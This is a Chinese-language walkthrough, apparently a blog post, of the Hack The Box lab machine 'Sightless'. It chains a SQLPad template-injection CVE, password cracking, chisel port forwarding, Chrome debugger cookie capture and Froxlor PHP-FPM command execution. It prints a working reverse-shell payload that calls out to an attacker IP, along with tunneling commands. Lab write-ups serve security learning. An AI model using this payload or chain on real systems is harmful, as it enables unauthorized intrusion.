Hack The Box-Sightless

总体思路

CVE-2022-0944->密码破解->chrome调试->PHP-FPM命令执行

信息收集&端口利用

nmap -sSVC sightless.htb

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-11 08:40 CST
Nmap scan report for sightless.htb
Host is up (0.84s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp
| tls-alpn: 
|_  ftp
| ssl-cert: Subject: commonName=sightless.htb/organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=US
| Not valid before: 2024-05-15T18:55:27
|_Not valid after:  2034-05-13T18:55:27
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings: 
|   GenericLines: 
|     220 ProFTPD Server (sightless.htb FTP Server)
|     Invalid command: try being more creative
|_    Invalid command: try being more creative
| tls-nextprotoneg: 
|_  ftp
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 c9:6e:3b:8f:c6:03:29:05:e5:a0:ca:00:90:c9:5c:52 (ECDSA)
|_  256 9b:de:3a:27:77:3b:1b:e1:19:5f:16:11:be:70:e0:56 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Sightless.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)

目标只开放了21、22和80端口,先看80端口信息

在这里插入图片描述

在这里插入图片描述

没有什么利用点

但是在提供的服务中,有一个重定向到了sqlpad.sightless.htb,将其加入hosts文件中访问

在这里插入图片描述

是一个sqlpad的组件,在有数据库用户密码的情况下能够连接到数据库并执行命令

在这里插入图片描述

CVE-2022-0944

在BP中能够发现其版本为6.10.0

在这里插入图片描述

搜索该版本漏洞,发现存在CVE-2022-0944

在这里插入图片描述

root@docker

过程为:点击连接->新建连接->选择MySQL作为数据库->在数据库当中输入payload->Test运行命令

在这里插入图片描述

#payload
{{ process.mainModule.require('child_process').exec('bash -c "bash -i >& /dev/tcp/10.10.16.2/9000 0>&1"') }}

在这里插入图片描述

发现直接就是root用户,怀疑当前在容器中

在这里插入图片描述

进一步查阅文件后,发现确实存在dockerenv文件

查看用户,发现还有michael和node两个用户

在这里插入图片描述

密码破解

michael@sightless

可能需要用到这两个用户登录到主机,查看shadow文件

在这里插入图片描述

将michael用户的hash值复制出来解密

在这里插入图片描述

使用该密码登录到主机

在这里插入图片描述

老样子三件套,查看sudo权限、suid权限和端口开放情况

sudo -l
find / -perm -u=s -f type 2>/dev/null
netstat -nltp

在这里插入图片描述

有一个8080端口可疑,转发到本地查看

#kali
chisel server -p 6150 --reverse
#target
chmod +x chisel
./chisel client 10.10.16.2:6150 R:8080:127.0.0.1:8080

在这里插入图片描述

是一个froxlor组件

一番尝试后好像也没有利用点

看看把另外几个端口代理出来

./chisel client 10.10.16.2:6150 R:3000:127.0.0.1:3000 R:8000:127.0.0.1:8080 R:41219:127.0.0.1:41219 R:43425:127.0.0.1:43425 R:44765:127.0.0.1:44765

chrome调试

使用bp的chrome进行调试

在这里插入图片描述

添加完后点击inspect fallback

在这里插入图片描述

在这里插入图片描述

能看到界面在登录和登录成功之间反复横跳,需要抓到登陆成功时候的cookie

替换后进入界面

在这里插入图片描述

PHP-FPM命令执行

root@sightless

找到PHP-FPM

在这里插入图片描述

按照他的格式添加命令

在这里插入图片描述

保存之后,重启一下服务

在这里插入图片描述

在这里插入图片描述

文件有了,需要再去修改一下权限才能查看

在这里插入图片描述

再按照刚刚的流程走一遍

在这里插入图片描述

复制到本地,修改权限后即可登录

在这里插入图片描述

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值